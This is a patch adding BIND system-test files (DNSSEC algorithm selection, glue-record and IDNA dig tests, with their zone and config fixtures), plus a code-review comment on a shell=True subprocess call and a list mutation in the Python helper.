@@ -0,0 +1,243 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This script is a 'port' broker. It keeps track of ports given to the +# individual system subtests, so every test is given a unique port range. + +import logging +import os +from pathlib import Path +import platform +import random +import subprocess +import time +from typing import Dict, List, NamedTuple, Union + +# Uncomment to enable DEBUG logging +# logging.basicConfig( +# format="get_algorithms.py %(levelname)s %(message)s", level=logging.DEBUG +# ) + +STABLE_PERIOD = 3600 * 3 +"""number of secs during which algorithm selection remains stable""" + + +class Algorithm(NamedTuple): + name: str + number: int + bits: int + + +class AlgorithmSet(NamedTuple): + """Collection of DEFAULT, ALTERNATIVE and DISABLED algorithms""" + + default: Union[Algorithm, List[Algorithm]] + """DEFAULT is the algorithm for testing.""" + + alternative: Union[Algorithm, List[Algorithm]] + """ALTERNATIVE is an alternative algorithm for test cases that require more + than one algorithm (for example algorithm rollover).""" + + disabled: Union[Algorithm, List[Algorithm]] + """DISABLED is an algorithm that is used for tests against the + "disable-algorithms" configuration option.""" + + +RSASHA1 = Algorithm("RSASHA1", 5, 1280) +RSASHA256 = Algorithm("RSASHA256", 8, 1280) +RSASHA512 = Algorithm("RSASHA512", 10, 1280) +ECDSAP256SHA256 = Algorithm("ECDSAP256SHA256", 13, 256) +ECDSAP384SHA384 = Algorithm("ECDSAP384SHA384", 14, 384) +ED25519 = Algorithm("ED25519", 15, 256) +ED448 = Algorithm("ED448", 16, 456) + +ALL_ALGORITHMS = [ + RSASHA1, 
+ RSASHA256, + RSASHA512, + ECDSAP256SHA256, + ECDSAP384SHA384, + ED25519, + ED448, +] + +ALGORITHM_SETS = { + "stable": AlgorithmSet( + default=ECDSAP256SHA256, alternative=RSASHA256, disabled=ECDSAP384SHA384 + ), + "ecc_default": AlgorithmSet( + default=[ + ECDSAP256SHA256, + ECDSAP384SHA384, + ED25519, + ED448, + ], + alternative=RSASHA256, + disabled=RSASHA512, + ), + # FUTURE The system tests needs more work before they're ready for this. + # "random": AlgorithmSet( + # default=ALL_ALGORITHMS, + # alternative=ALL_ALGORITHMS, + # disabled=ALL_ALGORITHMS, + # ), +} + +TESTCRYPTO = Path(__file__).resolve().parent / "testcrypto.sh" + +KEYGEN = os.getenv("KEYGEN", "") +if not KEYGEN: + raise RuntimeError("KEYGEN environment variable has to be set") + +ALGORITHM_SET = os.getenv("ALGORITHM_SET", "stable") +assert ALGORITHM_SET in ALGORITHM_SETS, f'ALGORITHM_SET "{ALGORITHM_SET}" unknown' +logging.debug('choosing from ALGORITHM_SET "%s"', ALGORITHM_SET) + + +def is_supported(alg: Algorithm) -> bool: + """Test whether a given algorithm is supported on the current platform.""" + try: + subprocess.run( + f"{TESTCRYPTO} -q {alg.name}", + shell=True, + check=True, + env={ + "KEYGEN": KEYGEN, + "TMPDIR": os.getenv("TMPDIR", "/tmp"), + }, + stdout=subprocess.DEVNULL, + ) + except subprocess.CalledProcessError as exc: + logging.debug(exc) + logging.info("algorithm %s not supported", alg.name) + return False + return True + + +def filter_supported(algs: AlgorithmSet) -> AlgorithmSet: + """Select supported algorithms from the set.""" + filtered = {} + for alg_type in algs._fields: + candidates = getattr(algs, alg_type) + if isinstance(candidates, Algorithm): + candidates = [candidates] + supported = list(filter(is_supported, candidates)) + if len(supported) == 1: + supported = supported.pop() + elif not supported: + raise RuntimeError( + f'no {alg_type.upper()} algorithm from "{ALGORITHM_SET}" set ' + "supported on this platform" + ) + filtered[alg_type] = supported + return 
AlgorithmSet(**filtered) + + +def select_random(algs: AlgorithmSet, stable_period=STABLE_PERIOD) -> AlgorithmSet: + """Select random DEFAULT, ALTERNATIVE and DISABLED algorithms from the set. + + The algorithm selection is deterministic for a given time period and + platform. This should make potential issues more reproducible. + + To increase the likelyhood of detecting an issue with a given algorithm in + CI, the current platform is used as a randomness source. When testing on + multiple platforms at the same time, this ensures more algorithm variance + while keeping reproducibility for a single platform. + + The function also ensures that DEFAULT, ALTERNATIVE and DISABLED algorithms + are all different. + """ + # FUTURE Random selection of ALTERNATIVE and DISABLED algorithms needs to + # be implemented. + alternative = algs.alternative + disabled = algs.disabled + assert isinstance( + alternative, Algorithm + ), "ALTERNATIVE algorithm randomization not supported yet" + assert isinstance( + disabled, Algorithm + ), "DISABLED algorithm randomization not supported yet" + + # initialize randomness + now = time.time() + time_seed = int(now - now % stable_period) + seed = f"{platform.platform()}_{time_seed}" + random.seed(seed) + + # DEFAULT selection + if isinstance(algs.default, Algorithm): + default = algs.default + else: + candidates = algs.default + for taken in [alternative, disabled]: + try: + candidates.remove(taken) + except ValueError: + pass + assert len(candidates), "no possible choice for DEFAULT algorithm" + random.shuffle(candidates) + default = candidates[0] + + # Ensure only single algorithm is present for each option + assert isinstance(default, Algorithm) + assert isinstance(alternative, Algorithm) + assert isinstance(disabled, Algorithm) + + assert default != alternative, "DEFAULT and ALTERNATIVE algorithms are the same" + assert default != disabled, "DEFAULT and DISABLED algorithms are the same" + assert alternative != disabled, "ALTERNATIVE and 
DISABLED algorithms are the same" + + return AlgorithmSet(default, alternative, disabled) + + +def algorithms_env(algs: AlgorithmSet) -> Dict[str, str]: + """Return environment variables with selected algorithms as a dict.""" + algs_env: Dict[str, str] = {} + + def set_alg_env(alg: Algorithm, prefix): + algs_env[f"{prefix}_ALGORITHM"] = alg.name + algs_env[f"{prefix}_ALGORITHM_NUMBER"] = str(alg.number) + algs_env[f"{prefix}_BITS"] = str(alg.bits) + + assert isinstance(algs.default, Algorithm) + assert isinstance(algs.alternative, Algorithm) + assert isinstance(algs.disabled, Algorithm) + + set_alg_env(algs.default, "DEFAULT") + set_alg_env(algs.alternative, "ALTERNATIVE") + set_alg_env(algs.disabled, "DISABLED") + + logging.info("selected algorithms: %s", algs_env) + return algs_env + + +def main(): + disable_checking = int(os.getenv("DISABLE_ALGORITHM_SUPPORT_CHECKING", "0")) + try: + algs = ALGORITHM_SETS[ALGORITHM_SET] + if not disable_checking: + algs = filter_supported(algs) + algs = select_random(algs) + algs_env = algorithms_env(algs) + except Exception: + # if anything goes wrong, the conf.sh ignores error codes, so make sure + # we set an environment variable to an error value that can be checked + # later by run.sh + print("export ALGORITHM_SET=error") + raise + for name, value in algs_env.items(): + print(f"export {name}={value}") + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/glue/clean.sh b/bin/tests/system/glue/clean.sh new file mode 100644 index 0000000..4d84f06 --- /dev/null +++ b/bin/tests/system/glue/clean.sh 
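Review bot: `is_supported()` builds its command as `f"{TESTCRYPTO} -q {alg.name}"` and runs it with `shell=True`, so the resolved checkout path is parsed by the shell; a build directory containing a space or a shell metacharacter breaks the probe or makes the shell run something other than testcrypto.sh. Pass an argument vector instead and drop `shell=True`: `subprocess.run([str(TESTCRYPTO), "-q", alg.name], check=True, env=..., stdout=subprocess.DEVNULL)`. Also, `select_random()` calls `candidates.remove(taken)` on `algs.default` itself, which is the list stored in `ALGORITHM_SETS` when `DISABLE_ALGORITHM_SUPPORT_CHECKING` is set; `candidates = list(algs.default)` keeps the module-level table intact. The header comment still describes a 'port' broker, which looks carried over from another script and should describe algorithm selection.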
@@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after glue tests. +# + +rm -f dig.out +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/glue/fi.good b/bin/tests/system/glue/fi.good new file mode 100644 index 0000000..a08bc7a --- /dev/null +++ b/bin/tests/system/glue/fi.good @@ -0,0 +1,27 @@ + +; <<>> DiG 9.0 <<>> +norec @10.53.0.1 -p 5300 foo.bar.fi. A +;; global options: printcmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58772 +;; flags: qr ad; QUERY: 1, ANSWER: 0, AUTHORITY: 6, ADDITIONAL: 7 + +;; QUESTION SECTION: +;foo.bar.fi. IN A + +;; AUTHORITY SECTION: +fi. 172800 IN NS NS.EU.NET. +fi. 172800 IN NS NS.TELE.fi. +fi. 172800 IN NS PRIFI.EUNET.fi. +fi. 172800 IN NS NS.UU.NET. +fi. 172800 IN NS T.NS.VERIO.NET. +fi. 172800 IN NS HYDRA.HELSINKI.fi. + +;; ADDITIONAL SECTION: +NS.TELE.fi. 172800 IN A 193.210.19.19 +NS.TELE.fi. 172800 IN A 193.210.18.18 +PRIFI.EUNET.fi. 172800 IN A 193.66.1.146 +NS.UU.NET. 172800 IN A 137.39.1.3 +T.NS.VERIO.NET. 172800 IN A 192.67.14.16 +HYDRA.HELSINKI.fi. 172800 IN A 128.214.4.29 +NS.EU.NET. 172800 IN A 192.16.202.11 + diff --git a/bin/tests/system/glue/noglue.good b/bin/tests/system/glue/noglue.good new file mode 100644 index 0000000..22eca7b --- /dev/null +++ b/bin/tests/system/glue/noglue.good 
@@ -0,0 +1,14 @@ + +; <<>> DiG 9.0 <<>> @10.53.0.1 -p 5300 example.net a +;; global options: printcmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29409 +;; flags: qr rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 0 + +;; QUESTION SECTION: +;example.net. IN A + +;; AUTHORITY SECTION: +example.net. 300 IN NS ns2.example. +example.net. 300 IN NS ns1.example. + diff --git a/bin/tests/system/glue/ns1/named.conf.in b/bin/tests/system/glue/ns1/named.conf.in new file mode 100644 index 0000000..4d1ef75 --- /dev/null +++ b/bin/tests/system/glue/ns1/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify no; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "root-servers.nil" { + type primary; + file "root-servers.nil.db"; +}; +zone "net" { + type primary; + file "net.db"; +}; diff --git a/bin/tests/system/glue/ns1/net.db b/bin/tests/system/glue/ns1/net.db new file mode 100644 index 0000000..db784cc --- /dev/null +++ b/bin/tests/system/glue/ns1/net.db 
@@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN net. +$TTL 300 +@ IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +@ NS a.root-servers.nil. + +; FI. authoritative servers, for the FI. glue test. +uu.net. NS ns.uu.net. +NS.UU.NET. 172800 IN A 137.39.1.3 +eu.net. NS ns.eu.net. +NS.EU.NET. 172800 IN A 192.16.202.11 + +; Referral outside of server authority, but with glue records present. +; Don't hand out the glue. +example.net. NS ns1.example. +example.net. NS ns2.example. +ns1.example. 172800 IN A 1.1.1.1 +ns2.example. 172800 IN A 2.2.2.2 diff --git a/bin/tests/system/glue/ns1/root-servers.nil.db b/bin/tests/system/glue/ns1/root-servers.nil.db new file mode 100644 index 0000000..1475aed --- /dev/null +++ b/bin/tests/system/glue/ns1/root-servers.nil.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns hostmaster ( + 1 + 3600 + 1800 + 1814400 + 3600 + ) + NS a +a A 10.53.0.1 +b A 10.53.0.2 + + + diff --git a/bin/tests/system/glue/ns1/root.db b/bin/tests/system/glue/ns1/root.db new file mode 100644 index 0000000..debdf01 --- /dev/null +++ b/bin/tests/system/glue/ns1/root.db 
@@ -0,0 +1,44 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+
+root-servers.nil. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+; Delegate some domains that contain name servers for the sample
+; ccTLDs below.
+net. 172800 IN NS a.root-servers.nil.
+
+;
+; A sample ccTLD
+;
+fi. 172800 IN NS NS.TELE.fi.
+fi. 172800 IN NS PRIFI.EUNET.fi.
+fi. 172800 IN NS NS.UU.NET.
+fi. 172800 IN NS T.NS.VERIO.NET.
+fi. 172800 IN NS HYDRA.HELSINKI.fi.
+fi. 172800 IN NS NS.EU.NET.
+NS.TELE.fi. 172800 IN A 193.210.18.18
+NS.TELE.fi. 172800 IN A 193.210.19.19
+PRIFI.EUNET.fi. 172800 IN A 193.66.1.146
+NS.UU.NET. 172800 IN A 137.39.1.3
+T.NS.VERIO.NET. 172800 IN A 192.67.14.16
+HYDRA.HELSINKI.fi. 172800 IN A 128.214.4.29
+NS.EU.NET. 172800 IN A 192.16.202.11
diff --git a/bin/tests/system/glue/setup.sh b/bin/tests/system/glue/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/glue/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/glue/tests.sh b/bin/tests/system/glue/tests.sh
new file mode 100644
index 0000000..c122c5e
--- /dev/null
+++ b/bin/tests/system/glue/tests.sh
@@ -0,0 +1,34 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+#
+# Do glue tests.
+#
+
+DIGOPTS="+norec -p ${PORT}"
+
+status=0
+
+echo_i "testing that a ccTLD referral gets a full glue set from the root zone"
+$DIG $DIGOPTS @10.53.0.1 foo.bar.fi. A >dig.out || status=1
+digcomp --lc fi.good dig.out || status=1
+
+echo_i "testing that we don't find out-of-zone glue"
+$DIG $DIGOPTS @10.53.0.1 example.net. a > dig.out || status=1
+digcomp noglue.good dig.out || status=1
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/idna/clean.sh b/bin/tests/system/idna/clean.sh
new file mode 100644
index 0000000..f99ecb5
--- /dev/null
+++ b/bin/tests/system/idna/clean.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f */named.memstats
+rm -f */named.run
+rm -f */named.conf
+rm -f dig.out.*
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/idna/ns1/named.conf.in b/bin/tests/system/idna/ns1/named.conf.in
new file mode 100644
index 0000000..df552bd
--- /dev/null
+++ b/bin/tests/system/idna/ns1/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { fd92:7065:b8e:ffff::1; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/idna/ns1/root.db b/bin/tests/system/idna/ns1/root.db
new file mode 100644
index 0000000..b43cc40
--- /dev/null
+++ b/bin/tests/system/idna/ns1/root.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+a.root-servers.nil. AAAA fd92:7065:b8e:ffff::1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+ns2.example. AAAA fd92:7065:b8e:ffff::2
diff --git a/bin/tests/system/idna/setup.sh b/bin/tests/system/idna/setup.sh
new file mode 100644
index 0000000..1dc06c2
--- /dev/null
+++ b/bin/tests/system/idna/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/idna/tests.sh b/bin/tests/system/idna/tests.sh
new file mode 100644
index 0000000..e38736e
--- /dev/null
+++ b/bin/tests/system/idna/tests.sh
@@ -0,0 +1,378 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# Set known locale for the tests + +if locale -a | grep -qE "^C\\.(UTF-8|utf8)"; then + LC_ALL="C.UTF-8" +elif locale -a | grep -qE "^en_US\\.(UTF-8|utf8)"; then + LC_ALL="en_US.UTF-8" +fi +export LC_ALL + +# This set of tests check the behavior of the IDNA options in "dig". +# +# "dig" supports two IDNA-related options: +# +# +[no]idnin - Translates a domain name into punycode format before sending +# the query to the server. +# +# Should the input name be a punycode name, "dig +idnin" will also +# validate the punycode, rejecting it if it is invalid. +# +# +[no]idnout - Translates the received punycode domain names into appropriate +# unicode characters before displaying. +# +# The tests run "dig" against an authoritative server configured with a minimal +# root zone and nothing else. As a result, all queries will result in an +# NXDOMAIN. The server will return the qname sent, which "dig" will display +# according to the options selected. This returned string is compared with +# the qname originally sent. +# +# In the comments below, the following nomenclature (taken from RFC 5890) is +# used: +# +# A-label: Label comprising ASCII characters that starts xn-- and whose +# characters after the xn-- are a valid output of the Punycode +# algorithm. +# +# Fake A-label: An A-label whose characters after the xn-- are not valid +# Punycode output. +# +# U-label: Unicode (native character) form of a label. 
+# +# For the purpose of this test script, U-labels do not include labels that +# comprise purely ASCII characters, which are referred to as "ASCII-labels" +# here. Valid ASCII-labels comprise letters, digits and hyphens and do not +# start with a hyphen. +# +# References: +# 1. http://www.unicode.org/reports/tr46/#Deviations +# 2. http://www.unicode.org/reports/tr46/#IDNAComparison + +# Using dig insecure mode as we are not testing DNSSEC here +DIGCMD="$DIG -i -p ${PORT} @10.53.0.1" + +# Initialize test count and status return +n=0 +status=0 + + +# Function for extracting the qname from the response +# +# This is the first field in the line after the line starting +# ";; QUESTION SECTION:". +# +# The string returned includes the trailing period. + +qname() { + awk 'BEGIN { qs = 0; } \ + /;; QUESTION SECTION:/ { qs = 1; next; } \ + qs == 1 {sub(";", "", $1) ; print $1; exit 0; }' \ + $1 +} + +# Function for performing a test where "dig" is expected to succeed. +# +# $1 - Description of the test +# $2 - Dig command additional options +# $3 - Name being queried +# $4 - The name that is expected to be displayed by "dig". Note that names +# displayed by "dig" will always have a trailing period, so this +# parameter should have that period as well. + +idna_test() { + n=`expr $n + 1` + description=$1 + if [ "$2" != "" ]; then + description="${description}: $2" + fi + echo_i "$description ($n)" + + ret=0 + $DIGCMD $2 $3 > dig.out.$n 2>&1 + if [ $? 
-ne 0 ]; then + echo_i "failed: dig command returned non-zero status" + ret=1 + else + actual=`qname dig.out.$n` + if [ "$4" != "$actual" ]; then + echo_i "failed: expected answer $4, actual result $actual" + ret=1 + fi + fi + status=`expr $status + $ret` +} + +# Function for performing a test where "dig" is expected to fail +# +# $1 - Description of the test +# $2 - Dig command additional options +# $3 - Name being queried + +idna_fail() { + n=`expr $n + 1` + description=$1 + if [ "$2" != "" ]; then + description="${description}: $2" + fi + echo_i "$description ($n)" + + ret=0 + $DIGCMD $2 $3 > dig.out.$n 2>&1 + if [ $? -eq 0 ]; then + echo_i "failed: dig command unexpectedly succeeded" + ret=1 + fi + status=`expr $status + $ret` +} + +# Function to check that case is preserved for an all-ASCII label. +# +# Without IDNA support, case-preservation is the expected behavior. +# +# With IDNA support... not really. IDNA maps uppercase ASCII characters to +# their lower-case equivalent. When IDNA support in "dig" was updated to +# non-transitional IDNA 2008, the switch "+idnin" was added and made the default +# behaviour. This meant that the command "dig LocalhosT" (no command switches) +# sends the qname "localhost", a change in behavior from earlier versions. +# +# This was felt to be confusing to the significant number of users who are +# not interested in IDNA. For this reason, after "dig" passes the input qname +# through the IDNA conversion, is does a case-insensitive comparison with the +# result. If the two are the same, "dig" can conclude that the qname is +# entirely ASCII and is uses the entered string instead of the converted string +# as the qname. + +ascii_case_preservation_test() { + text="Checking valid ASCII label" + idna_test "$text" "" LocalhosT LocalhosT. + idna_test "$text" "+noidnin +noidnout" LocalhosT LocalhosT. + idna_test "$text" "+noidnin +idnout" LocalhosT LocalhosT. + idna_test "$text" "+idnin +noidnout" LocalhosT LocalhosT. 
+ idna_test "$text" "+idnin +idnout" LocalhosT LocalhosT. +} + +# Function to perform the tests if IDNA is enabled. + +idna_enabled_test() { + echo_i "IDNA is enabled, all IDNA tests will be performed" + # Check that case is preserved on an ASCII label. + + ascii_case_preservation_test + + + # Test of a valid U-label + # + # +noidnin +noidnout: The label is sent as a unicode octet stream and dig + # will display the string in the \nnn format. + # +noidnin +idnout: As for the previous case. + # +idnin +noidnout: The label is converted to the xn-- format. "dig" + # displays the returned xn-- text. + # +idnin +idnout: The label is converted to the xn-- format. "dig" + # converts the returned xn-- string back to the original + # unicode text. + # + # Note that ASCII characters are converted to lower-case. + + text="Checking valid non-ASCII label" + idna_test "$text" "" "München" "M\195\188nchen." + idna_test "$text" "+noidnin +noidnout" "München" "M\195\188nchen." + idna_test "$text" "+noidnin +idnout" "München" "M\195\188nchen." + idna_test "$text" "+idnin +noidnout" "München" "xn--mnchen-3ya." + idna_test "$text" "+idnin +idnout" "München" "münchen." + + + # Tests of transitional processing of a valid U-label + # + # IDNA2003 introduced national character sets but, unfortunately, didn't + # support several characters properly. One of those was the German + # character "ß" (the "Eszett" or "sharp s"), which was interpreted as "ss". + # So the domain “faß.de†domain (for example) was processed as “fass.deâ€. + # + # This was corrected in IDNA2008, although some vendors that adopted this + # standard chose to keep the existing IDNA2003 translation for this + # character to prevent problems (e.g. people visiting www.faß.example would, + # under IDNA2003, go to www.fass.example but under IDNA2008 would end up at + # www.fa\195\159.example - a different web site). 
+ # + # BIND has adopted a hard transition, so this test checks that these + # transitional mapping is not used. The tests are essentially the same as + # for the valid U-label. + + text="Checking that non-transitional IDNA processing is used" + idna_test "$text" "" "faß.de" "fa\195\159.de." + idna_test "$text" "+noidnin +noidnout" "faß.de" "fa\195\159.de." + idna_test "$text" "+noidnin +idnout" "faß.de" "fa\195\159.de." + idna_test "$text" "+idnin +noidnout" "faß.de" "xn--fa-hia.de." + idna_test "$text" "+idnin +idnout" "faß.de" "faß.de." + + # Another problem character. The final character in the first label mapped + # onto the Greek sigma character ("σ") in IDNA2003. + + text="Second check that non-transitional IDNA processing is used" + idna_test "$text" "" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+noidnin +noidnout" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+noidnin +idnout" "βόλος.com" "\206\178\207\140\206\187\206\191\207\130.com." + idna_test "$text" "+idnin +noidnout" "βόλος.com" "xn--nxasmm1c.com." + idna_test "$text" "+idnin +idnout" "βόλος.com" "βόλος.com." + + + + # Tests of a valid A-label (i.e. starting xn--) + # + # +noidnout: The string is sent as-is to the server and the returned qname + # is displayed in the same form. + # +idnout: The string is sent as-is to the server and the returned qname + # is displayed as the corresponding U-label. + # + # The "+[no]idnin" flag has no effect in these cases. + + text="Checking valid A-label" + idna_test "$text" "" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+noidnin +noidnout" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+noidnin +idnout" "xn--nxasmq6b.com" "βόλοσ.com." + idna_test "$text" "+idnin +noidnout" "xn--nxasmq6b.com" "xn--nxasmq6b.com." + idna_test "$text" "+idnin +idnout" "xn--nxasmq6b.com" "βόλοσ.com." 
+ + # Test of valid A-label in locale that cannot display it + # + # +noidnout: The string is sent as-is to the server and the returned qname + # is displayed in the same form. + # +idnout: The string is sent as-is to the server and the returned qname + # is displayed as the corresponding A-label. + # + # The "+[no]idnout" flag has no effect in these cases. + saved_LC_ALL="${LC_ALL}" + LC_ALL="C" + text="Checking valid A-label in C locale" + label="xn--nxasmq6b.com" + if command -v idn2 >/dev/null && ! idn2 -d "$label" >/dev/null 2>/dev/null; then + idna_test "$text" "" "$label" "$label." + idna_test "$text" "+noidnin +noidnout" "$label" "$label." + idna_test "$text" "+noidnin +idnout" "$label" "$label." + idna_test "$text" "+idnin +noidnout" "$label" "$label." + idna_test "$text" "+idnin +idnout" "$label" "$label." + idna_test "$text" "+noidnin +idnout" "$label" "$label." + fi + LC_ALL="${saved_LC_ALL}" + + + + # Tests of invalid A-labels + # + # +noidnin: The label is sent as-is to the server and dig will display the + # returned fake A-label in the same form. + # +idnin: "dig" should report that the label is not correct. + # + # +[no]idnout: If the label makes it to the server (via +noidnin), "dig" + # should report an error if +idnout is specified. + + # The minimum length of a punycode A-label is 7 characters. Check that + # a shorter label is detected and rejected. + + text="Checking punycode label shorter than minimum valid length" + idna_test "$text" "" "xn--xx" "xn--xx." + idna_test "$text" "+noidnin +noidnout" "xn--xx" "xn--xx." + idna_fail "$text" "+noidnin +idnout" "xn--xx" + idna_fail "$text" "+idnin +noidnout" "xn--xx" + idna_fail "$text" "+idnin +idnout" "xn--xx" + + # Fake A-label - the string does not translate to anything. + + text="Checking fake A-label" + idna_test "$text" "" "xn--ahahah" "xn--ahahah." + idna_test "$text" "+noidnin +noidnout" "xn--ahahah" "xn--ahahah." 
